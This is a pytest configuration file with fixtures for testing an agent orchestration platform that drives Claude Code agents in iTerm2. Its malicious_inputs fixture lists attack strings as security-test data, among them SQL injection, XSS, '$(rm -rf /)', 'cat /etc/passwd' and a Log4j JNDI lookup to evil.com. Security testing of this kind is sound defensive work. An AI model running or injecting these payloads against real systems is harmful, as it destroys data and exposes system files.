"""
Global pytest configuration and fixtures for Agent Orchestration Platform testing.
This module provides comprehensive testing infrastructure including:
- Event loop configuration for async testing
- Mock managers for external dependencies (iTerm2, Claude Code)
- Domain-specific test fixtures
- Temporary filesystem setup for isolated testing
- Sample data generators for consistent testing
Author: Adder_1 | Created: 2025-06-26 | Testing Infrastructure Task
"""
import pytest
import asyncio
import tempfile
import shutil
from pathlib import Path
from typing import AsyncGenerator, Generator, Dict, Any, List
from unittest.mock import AsyncMock, MagicMock
from dataclasses import dataclass
import json
from datetime import datetime
# Import test fixtures and mocks (will be created in subsequent subtasks)
# from tests.mocks.iterm_manager import MockiTermManager
# from tests.mocks.claude_code import MockClaudeCodeManager
# from tests.fixtures.domain import *
# ============================================================================
# Pytest Configuration and Event Loop Setup
# ============================================================================
# Configure pytest for async testing
pytest_plugins = ["pytest_asyncio"]
@pytest.fixture(scope="session")
def event_loop():
"""Create an instance of the default event loop for the test session."""
policy = asyncio.get_event_loop_policy()
loop = policy.new_event_loop()
asyncio.set_event_loop(loop)
try:
yield loop
finally:
loop.close()
@pytest.fixture(scope="function")
def clean_event_loop():
"""Provide a clean event loop for each test function."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
yield loop
finally:
loop.close()
# ============================================================================
# Temporary Filesystem and Session Management
# ============================================================================
@pytest.fixture
def temp_session_root(tmp_path: Path) -> Path:
"""
Provide temporary directory structure for session testing.
Creates a complete session directory structure with:
- .claude_session/ (encrypted session metadata)
- development/ (ADDER+ workflow files)
- development/tasks/ (individual task files)
- .git/ (Git integration simulation)
"""
session_dir = tmp_path / "test_session"
session_dir.mkdir()
# Create session metadata directory
claude_session_dir = session_dir / ".claude_session"
claude_session_dir.mkdir()
# Create development workflow structure
dev_dir = session_dir / "development"
dev_dir.mkdir()
tasks_dir = dev_dir / "tasks"
tasks_dir.mkdir()
protocols_dir = dev_dir / "protocols"
protocols_dir.mkdir()
# Create git directory (simulation)
git_dir = session_dir / ".git"
git_dir.mkdir()
# Create basic project structure
src_dir = session_dir / "src"
src_dir.mkdir()
tests_dir = session_dir / "tests"
tests_dir.mkdir()
return session_dir
@pytest.fixture
def sample_todo_content() -> str:
"""Provide sample TODO.md content for testing task management."""
return '''# Project Task Management Dashboard
**Project**: Test Project
**Last Updated**: 2025-06-26 by Adder_1
**Overall Progress**: 2/5 tasks complete
## Task Status Overview
- **NOT_STARTED**: 1 π΄
- **IN_PROGRESS**: 2 π‘
- **REVIEW_READY**: 0 π
- **COMPLETE**: 2 β
- **BLOCKED**: 0 β
## Current Assignments
| Task | Status | Agent | Priority | Dependencies |
|------|--------|-------|----------|--------------|
| TASK_1 | COMPLETE | Adder_1 | HIGH | None |
| TASK_2 | COMPLETE | Adder_2 | HIGH | None |
| TASK_3 | IN_PROGRESS | Adder_3 | HIGH | TASK_1, TASK_2 |
| TASK_4 | IN_PROGRESS | Adder_4 | MEDIUM | TASK_3 |
| TASK_5 | NOT_STARTED | Unassigned | LOW | TASK_4 |
## Architecture Overview
Test project for validating agent orchestration platform functionality.
'''
@pytest.fixture
def sample_task_content() -> str:
"""Provide sample TASK_X.md content for testing task file parsing."""
return '''# TASK_1: Test Task Implementation
**Created By**: Adder_1 | **Priority**: HIGH | **Duration**: 2 hours
**Technique Focus**: Testing + Validation
**Size Constraint**: Target <200 lines/module
## π¦ Status & Assignment
**Status**: IN_PROGRESS
**Assigned**: Adder_1
**Dependencies**: None
**Blocking**: TASK_2, TASK_3
## β
Implementation Subtasks (Sequential completion)
### Phase 1: Setup
- [x] **Subtask 1.1**: Initialize test framework
- [ ] **Subtask 1.2**: Create test cases
- [ ] **Subtask 1.3**: Implement validation
### Phase 2: Execution
- [ ] **Subtask 2.1**: Run tests
- [ ] **Subtask 2.2**: Validate results
## Success Criteria
- [ ] All tests passing
- [ ] Coverage above 95%
- [ ] Documentation complete
'''
# ============================================================================
# Domain-Specific Test Data and Types
# ============================================================================
@dataclass
class TestAgentState:
"""Test representation of agent state for testing."""
agent_id: str
session_id: str
name: str
status: str = "ACTIVE"
specialization: str = ""
iterm_tab_id: str = "test_tab_123"
process_id: int = 12345
@dataclass
class TestSessionState:
"""Test representation of session state for testing."""
session_id: str
name: str
root_path: str
created_at: str
agents: Dict[str, TestAgentState]
@pytest.fixture
def sample_agent_state() -> TestAgentState:
"""Provide sample agent state for testing."""
return TestAgentState(
agent_id="agent_test_001",
session_id="session_test_001",
name="Agent_1",
status="ACTIVE",
specialization="ADDER+ Testing",
iterm_tab_id="test_tab_001",
process_id=12345
)
@pytest.fixture
def sample_session_state(temp_session_root: Path) -> TestSessionState:
"""Provide sample session state for testing."""
agent = TestAgentState(
agent_id="agent_test_001",
session_id="session_test_001",
name="Agent_1"
)
return TestSessionState(
session_id="session_test_001",
name="Test Session",
root_path=str(temp_session_root),
created_at=datetime.now().isoformat(),
agents={"agent_test_001": agent}
)
@pytest.fixture
def multiple_agents() -> List[TestAgentState]:
"""Provide multiple agent states for concurrent testing."""
return [
TestAgentState(
agent_id=f"agent_test_{i:03d}",
session_id="session_test_001",
name=f"Agent_{i}",
status="ACTIVE" if i % 2 == 0 else "IDLE",
specialization=f"Specialist_{i}"
)
for i in range(1, 9) # Create 8 agents for testing
]
# ============================================================================
# Mock Infrastructure Fixtures (Placeholder for future implementation)
# ============================================================================
@pytest.fixture
async def mock_iterm_manager() -> AsyncGenerator[AsyncMock, None]:
"""
Provide mock iTerm2 manager for testing without iTerm2 dependency.
TODO: Replace with actual MockiTermManager once implemented.
"""
manager = AsyncMock()
# Configure mock behavior
manager.create_tab.return_value = "mock_tab_id_123"
manager.close_tab.return_value = True
manager.send_text.return_value = True
manager.get_tab_status.return_value = {"active": True, "responsive": True}
manager.list_tabs.return_value = ["tab_1", "tab_2", "tab_3"]
# Initialize mock
await manager.initialize()
try:
yield manager
finally:
await manager.cleanup()
@pytest.fixture
async def mock_claude_manager() -> AsyncGenerator[AsyncMock, None]:
"""
Provide mock Claude Code manager for testing without Claude Code dependency.
TODO: Replace with actual MockClaudeCodeManager once implemented.
"""
manager = AsyncMock()
# Configure mock behavior
manager.spawn_process.return_value = {"process_id": 12345, "success": True}
manager.send_message.return_value = {"success": True, "response": "Mock response"}
manager.get_process_status.return_value = {"running": True, "responsive": True}
manager.terminate_process.return_value = True
# Initialize mock
await manager.initialize()
try:
yield manager
finally:
await manager.cleanup()
# ============================================================================
# Security and Validation Test Fixtures
# ============================================================================
@pytest.fixture
def malicious_inputs() -> List[str]:
"""Provide common malicious input patterns for security testing."""
return [
"'; DROP TABLE agents; --", # SQL injection
"<script>alert('xss')</script>", # XSS
"../../../etc/passwd", # Path traversal
"$(rm -rf /)", # Command injection
"'; cat /etc/passwd; echo '", # Command chaining
"\\x00\\x00\\x00\\x00", # Null byte injection
"' OR '1'='1", # Authentication bypass
"${jndi:ldap://evil.com/a}", # Log4j-style injection
"{{7*7}}", # Template injection
"javascript:alert('xss')", # JavaScript protocol
"\r\n\r\nHTTP/1.1 200 OK\r\n", # HTTP response splitting
"eval(document.cookie)", # JavaScript eval injection
]
@pytest.fixture
def valid_agent_names() -> List[str]:
"""Provide valid agent name patterns for testing."""
return [
"Agent_1",
"Agent_99",
"Agent_123",
"Agent_001",
"Agent_42"
]
@pytest.fixture
def invalid_agent_names() -> List[str]:
"""Provide invalid agent name patterns for testing."""
return [
"agent_1", # lowercase
"Agent1", # missing underscore
"Agent_", # missing number
"Agent_abc", # non-numeric
"AGENT_1", # all caps
"", # empty
"Agent_0", # zero (might be invalid)
"Agent_-1", # negative
"Agent_1.5", # decimal
"Agent_1 ", # trailing space
" Agent_1", # leading space
]
# ============================================================================
# Performance Testing Fixtures
# ============================================================================
@pytest.fixture
def performance_config() -> Dict[str, Any]:
"""Provide configuration for performance testing."""
return {
"max_agents": 8,
"max_concurrent_operations": 16,
"timeout_seconds": 30,
"memory_limit_mb": 512,
"cpu_limit_percent": 25,
"benchmark_iterations": 100,
"warmup_iterations": 10
}
# ============================================================================
# CI/CD and Integration Test Fixtures
# ============================================================================
@pytest.fixture
def ci_environment() -> Dict[str, str]:
"""Provide CI environment configuration for testing."""
return {
"CI": "true",
"TESTING_MODE": "automated",
"LOG_LEVEL": "INFO",
"ENABLE_EXTERNAL_SERVICES": "false",
"MOCK_EXTERNAL_DEPENDENCIES": "true"
}
@pytest.fixture(scope="session")
def test_database_url() -> str:
"""Provide test database URL for integration testing."""
return "sqlite:///:memory:"
# ============================================================================
# Cleanup and Teardown Fixtures
# ============================================================================
@pytest.fixture(autouse=True)
def cleanup_temp_files(tmp_path: Path):
"""Automatically cleanup temporary files after each test."""
yield
# Cleanup is automatic with tmp_path fixture
pass
@pytest.fixture(autouse=True)
def reset_asyncio_state():
"""Reset asyncio state between tests to prevent interference."""
# Clear any pending tasks
try:
loop = asyncio.get_running_loop()
tasks = [task for task in asyncio.all_tasks(loop) if not task.done()]
for task in tasks:
task.cancel()
except RuntimeError:
# No running loop, which is fine
pass
yield
# Post-test cleanup
try:
loop = asyncio.get_running_loop()
tasks = [task for task in asyncio.all_tasks(loop) if not task.done()]
for task in tasks:
task.cancel()
except RuntimeError:
pass
# ============================================================================
# Test Markers and Parametrization Helpers
# ============================================================================
def pytest_configure(config):
"""Configure pytest with custom markers and settings."""
# Markers are defined in pyproject.toml
pass
def pytest_collection_modifyitems(config, items):
"""Modify test collection to add automatic markers based on test names."""
for item in items:
# Add markers based on test file location
if "security" in str(item.fspath):
item.add_marker(pytest.mark.security)
if "performance" in str(item.fspath):
item.add_marker(pytest.mark.performance)
if "integration" in str(item.fspath):
item.add_marker(pytest.mark.integration)
if "properties" in str(item.fspath):
item.add_marker(pytest.mark.property)
# Add slow marker for tests that might take time
if any(keyword in item.name.lower() for keyword in ["concurrent", "stress", "benchmark"]):
item.add_marker(pytest.mark.slow)
# ============================================================================
# Debugging and Development Helpers
# ============================================================================
@pytest.fixture
def debug_mode() -> bool:
"""Enable debug mode for detailed test output."""
import os
return os.getenv("PYTEST_DEBUG", "false").lower() == "true"
@pytest.fixture
def capture_logs(caplog):
"""Provide log capture capability for testing logging behavior."""
return caplog
# Mark this as the end of conftest.py setup
pytest.main_fixture_setup_complete = True